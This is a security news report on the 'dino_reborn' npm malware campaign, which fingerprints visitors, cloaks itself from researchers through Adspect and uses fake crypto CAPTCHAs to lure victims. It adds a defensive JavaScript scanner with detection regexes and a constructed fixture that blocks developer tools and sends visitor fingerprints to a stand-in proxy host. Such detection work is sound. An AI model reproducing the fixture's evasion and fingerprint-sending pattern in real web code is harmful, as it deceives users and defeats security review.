A sophisticated malware campaign has been discovered targeting the widely used npm JavaScript package registry. Operating under the alias “dino_reborn,” the threat actor has deployed malicious packages designed to distinguish potential victims from security researchers before triggering their harmful payloads. This supply chain attack uses traffic cloaking and browser-based evasion tactics to deliver tailored malicious content, representing a new level of sophistication in cyber threats.
Seven malicious npm packages have been identified as part of this campaign: signals-embed, dsidospsodlks, applicationooks21, application-phskck, integrator-filescrypt2025, integrator-2829, and integrator-2830. Six of these packages contain approximately 39 kilobytes of malware, while the seventh is responsible for constructing a malicious webpage. When a user visits a site deployed by these packages, the malware initiates an analysis of their behavior and system characteristics to classify them. Based on this classification, distinct experiences are presented, with potential victims encountering a convincing fake CAPTCHA leading to scam sites used for cryptocurrency theft, while researchers are shown only blank pages designed to hide the true nature of the attack.
Technical Analysis of the Detection Evasion Mechanism
Security analysts from Socket.dev identified and documented this intricate campaign by uncovering the interconnected infrastructure linking all the malicious packages to a single threat actor. Their investigation traced the creation email associated with these packages to geneboo@proton[.]me. The research team further revealed that the attacker was leveraging Adspect, a legitimate service typically used to distinguish between bots and real visitors, by weaponizing its capabilities within the npm packages.
The campaign’s design prioritizes evading both automated security scanners and manual analysis. Upon execution, the malware encapsulates its code within an Immediately Invoked Function Expression (IIFE), ensuring automatic execution without requiring explicit function calls. To actively deter researchers, the code employs aggressive tactics, including disabling browser developer tools, preventing right-click context menus, blocking keyboard shortcuts like F12, Ctrl+U, and Ctrl+Shift+I, and initiating continuous page reloads if developer tools are detected.
The core innovation of this npm malware campaign lies in its sophisticated fingerprinting system, which collects thirteen distinct data points from each visitor. When a user accesses a compromised website, the JavaScript payload gathers information such as the browser user agent, host information, referrer URL, request method, server hostname, protocol encryption status, request timestamp, language preferences, and accepted encoding formats. This comprehensive data collection creates a detailed profile that is transmitted to the Adspect API via a proxy endpoint, such as association-google.xyz/adspect-proxy.php, effectively replicating server-side request capabilities within the browser environment.
The cloaking decision is the hinge of the campaign. Adspect analyzes the characteristics of the traffic and returns a response indicating whether the visitor appears legitimate or suspicious. If Adspect determines the traffic originates from a researcher, it returns an “ok: false” status. This response triggers the display of a blank white page containing only innocuous text about Offlido, a fabricated offline storage company. This benign page appears legitimate to any analyst who inspects it, providing effective cover for the real payload.
Conversely, if Adspect identifies the visitor as a potential victim, it returns “ok: true” coupled with a malicious redirect URL. This then triggers the display of a fake CAPTCHA interface. This CAPTCHA is designed to mimic legitimate verification systems from prominent cryptocurrency exchanges like Uniswap and Jupiter, employing their branding to establish false credibility. When victims click the verification checkbox, a brief three-second loading animation plays, followed by a simulated success message and an automatic redirection to the malicious URL in a new browser tab. This psychological manipulation tactic, combined with a familiar interface, significantly increases the likelihood that victims will trust and engage with the redirect without raising suspicion.
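The anti-analysis and cloaking behaviours described above (the IIFE wrapper, context-menu and F12/Ctrl+U/Ctrl+Shift+I blocking, the reload loop when developer tools are detected, visitor fingerprinting, the call to an Adspect proxy, and the `ok: true`/`ok: false` branch) are all observable in package source at rest, which makes them usable as detection indicators before a package is installed. The scanner below is an added example and is not code from the Socket.dev report or from the packages it describes; the indicator weights, the threshold, the file paths and both fixtures are the author's assumptions, and the fixtures are constructed rather than real package contents.

```javascript
// Heuristic scanner for the anti-analysis and cloaking indicators the article
// lists. Added example; weights, threshold and fixtures are assumptions.

// Visitor-fingerprint fields the article says the payload collects (subset).
const FINGERPRINT_FIELDS = [
  /navigator\.userAgent/, /document\.referrer/, /navigator\.language/,
  /location\.host(?:name)?/, /location\.protocol/, /navigator\.platform/,
];

const INDICATORS = [
  { id: 'iife-wrapper', weight: 1,
    note: 'whole payload wrapped in an IIFE so it runs on load without a call',
    test: (s) => /\(\s*(?:function\s*\([^)]*\)|\([^)]*\)\s*=>)\s*\{[\s\S]*?\}\s*\)\s*\(\s*\)/.test(s) },
  { id: 'contextmenu-block', weight: 2,
    note: 'right-click context menu suppressed',
    test: (s) => /addEventListener\(\s*['"]contextmenu['"][\s\S]{0,160}?preventDefault|oncontextmenu\s*=/.test(s) },
  { id: 'devtools-shortcuts', weight: 3,
    note: 'F12 / Ctrl+U / Ctrl+Shift+I keyboard shortcuts intercepted',
    test: (s) => /keyCode\s*===?\s*123|key\s*===?\s*['"]F12['"]|ctrlKey[\s\S]{0,80}?(?:keyCode\s*===?\s*(?:73|85)|key\s*===?\s*['"][IiUu]['"])/.test(s) },
  { id: 'devtools-reload-loop', weight: 3,
    note: 'page reloads when a devtools-sized window delta is detected',
    test: (s) => /(?:outerWidth\s*-\s*(?:window\.)?innerWidth|outerHeight\s*-\s*(?:window\.)?innerHeight)[\s\S]{0,200}?location\.reload\(/.test(s) },
  { id: 'fingerprinting', weight: 2,
    note: 'three or more visitor-fingerprint fields collected',
    test: (s) => FINGERPRINT_FIELDS.filter((re) => re.test(s)).length >= 3 },
  { id: 'cloaking-proxy', weight: 4,
    note: 'request to an Adspect-style cloaking proxy',
    test: (s) => /adspect/i.test(s) },
  { id: 'cloak-decision', weight: 3,
    note: 'branch on an ok:true / ok:false cloaking verdict',
    test: (s) => /\.ok\s*[!=]==?\s*(?:true|false)|\bok\s*:\s*(?:true|false)/.test(s) },
];

// Assumed threshold: a single strong indicator is not enough; two or more
// (or the proxy call plus anything else) flag the file for review.
const SUSPICIOUS_THRESHOLD = 6;

// Score one source file and report which indicators fired.
function scanSource(src) {
  const hits = INDICATORS.filter((ind) => ind.test(src));
  const score = hits.reduce((sum, ind) => sum + ind.weight, 0);
  return {
    score,
    hits: hits.map((ind) => ind.id),
    notes: hits.map((ind) => ind.note),
    verdict: score >= SUSPICIOUS_THRESHOLD ? 'suspicious' : 'clean',
  };
}

// Scan every JavaScript file of an unpacked package; `files` maps path -> source.
// The package verdict is the worst per-file verdict.
function scanPackage(files) {
  const perFile = Object.entries(files)
    .filter(([path]) => /\.(?:m?js|cjs)$/.test(path))
    .map(([path, src]) => ({ path, ...scanSource(src) }));
  const worst = perFile.reduce((a, b) => (b.score > a.score ? b : a), { score: -1 });
  return { verdict: worst.score >= SUSPICIOUS_THRESHOLD ? 'suspicious' : 'clean', files: perFile };
}

// Constructed fixture resembling the loader behaviour the article describes.
// It is inert text for the scanner, not a working payload.
const SUSPICIOUS_FIXTURE = `
(function () {
  document.addEventListener('contextmenu', function (e) { e.preventDefault(); });
  document.addEventListener('keydown', function (e) {
    if (e.keyCode === 123 || (e.ctrlKey && e.shiftKey && e.keyCode === 73) || (e.ctrlKey && e.keyCode === 85)) { e.preventDefault(); }
  });
  setInterval(function () { if (window.outerWidth - window.innerWidth > 160) { location.reload(); } }, 500);
  var fp = { ua: navigator.userAgent, host: location.host, ref: document.referrer, lang: navigator.language };
  fetch('https://example.invalid/adspect-proxy.php', { method: 'POST', body: JSON.stringify(fp) })
    .then(function (r) { return r.json(); })
    .then(function (d) { if (d.ok === false) { renderBlank(); } else { renderCaptcha(d.url); } });
})();
`;

// Constructed benign fixture: ordinary analytics code that touches a couple of
// the same browser fields but none of the anti-analysis behaviours.
const BENIGN_FIXTURE = `
export function trackPageView(endpoint) {
  const payload = { path: location.pathname, ref: document.referrer, lang: navigator.language };
  document.getElementById('cta').addEventListener('click', function () { payload.clicked = true; });
  return fetch(endpoint, { method: 'POST', body: JSON.stringify(payload) });
}
`;

if (typeof require !== 'undefined' && require.main === module) {
  const report = scanPackage({ 'dist/loader.js': SUSPICIOUS_FIXTURE, 'lib/analytics.js': BENIGN_FIXTURE });
  console.log(JSON.stringify(report, null, 2));
}
```

Run it over the `package/` directory of an `npm pack` tarball (read each file into the `files` map) as a pre-install gate or a registry-mirror check. The weights deliberately make the Adspect proxy call and the `ok` branch the heaviest signals, because a legitimate front-end library has no reason to consult a traffic-cloaking service; the devtools-blocking tricks alone appear in some anti-copy scripts, so they raise the score without reaching the threshold on their own.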
The attacker’s infrastructure demonstrates considerable flexibility. Due to Adspect’s capability to return new redirect URLs with each request, the threat actor can modify the final destinations server-side without needing to republish any npm packages. This agility makes traditional takedown efforts reactive rather than preventative, allowing the campaign to remain operational even after initial detection and the removal of packages from the npm registry. The continued evolution of such supply chain attacks underscores the persistent threat to software development ecosystems and the ongoing need for enhanced security vigilance.